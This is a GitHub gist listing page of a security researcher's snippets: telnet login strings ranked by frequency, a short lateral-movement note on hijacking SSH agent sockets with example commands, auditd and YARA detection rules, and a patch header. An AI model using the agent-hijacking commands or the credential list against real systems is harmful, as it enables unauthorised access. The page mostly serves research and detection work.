Skip to content

Instantly share code, notes, and snippets.

View timb-machine's full-sized avatar

Tim Brown timb-machine

174 followers · 470 following
View GitHub Profile
@timb-machine
timb-machine / Telnet authentication strings
Created February 13, 2021 19:36
Telnet authentication strings
461 root
392
160 admin
94 default
39 guest
24 support
21 user
20 1234
16 password
15 12345
@timb-machine
timb-machine / SSH Agent Forwarding.md
Created February 20, 2021 10:51 — forked from int0x80/SSH Agent Forwarding.md

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@timb-machine
timb-machine / AWS API calls that return credentials.md
Created February 22, 2021 19:02 — forked from kmcquade/AWS API calls that return credentials.md
AWS API calls that return credentials
@timb-machine
timb-machine / auditd-generate-rule.sh
Last active February 28, 2021 08:33
auditd-generate-rule.sh
#!/bin/sh
generate_file_rule () {
filepermissions="${1}"
rulename="${2}"
while read filename
do
printf -- "-w %s -p %s -k %s\n" "${filename}" "${filepermissions}" "${rulename}"
done
}
@timb-machine
timb-machine / aix.yara
Created February 28, 2021 19:18
aix.yara
rule aix {
meta:
author = "Tim Brown @timb_machine"
description = "AIX binary"
strings:
$libca = "libc.a"
$text = ".text"
$data = ".data"
condition:
$libca and $text and $data
@timb-machine
timb-machine / accept-environment.patch
Created February 28, 2021 20:41
accept-environment.patch
Description: Accept environment changes.
Accept environment changes during negotiation by the client.
Author: Tim Brown <[email protected]>
---
The information above should follow the Patch Tagging Guidelines, please
checkout http://dep.debian.net/deps/dep3/ to learn about the format. Here
are templates for supplementary fields that you might want to add:
Origin: <vendor|upstream|other>, <url of original patch>
@timb-machine
timb-machine / ciscotools.yara
Created February 28, 2021 21:28
ciscotools.yara
rule ciscotools {
meta:
author = "Tim Brown @timb_machine"
description = "Cisco tools"
strings:
$labs = "labs.portcullis.co.uk"
$portcullislabs = "portcullislabs"
$CiscoCXSecurity = "CiscoCXSecurity"
$timb_machine = "timb_machine"
$pentestmonkey = "pentestmonkey"
@timb-machine
timb-machine / adonunix2.yara
Last active March 1, 2021 11:14
adonunix2.yara
rule adonunix2 {
meta:
author = "Tim Brown @timb_machine"
description = "AD on UNIX"
strings:
$quest = "/quest"
$sss = "/sss"
$pbis = "/pbis"
$ipa = "/ipa"
$samba = "/samba"
@timb-machine
timb-machine / enterpriseunix2.yara
Last active March 1, 2021 18:13
enterpriseunix2.yara
import "elf"
rule enterpriseunix2 {
meta:
author = "Tim Brown @timb_machine"
description = "Enterprise UNIX"
strings:
$aix = "aix" nocase
$solaris = "solaris" nocase
$hpux = "hpux" nocase
@timb-machine
timb-machine / enterpriseapps2.yara
Last active March 1, 2021 18:19
enterpriseapps2.yara
import "elf"
rule enterpriseapps2 {
meta:
author = "Tim Brown @timb_machine"
description = "Enterprise apps"
strings:
$db2 = "db2" nocase
$oracle = "oracle" nocase
$mysql = "mysql" nocase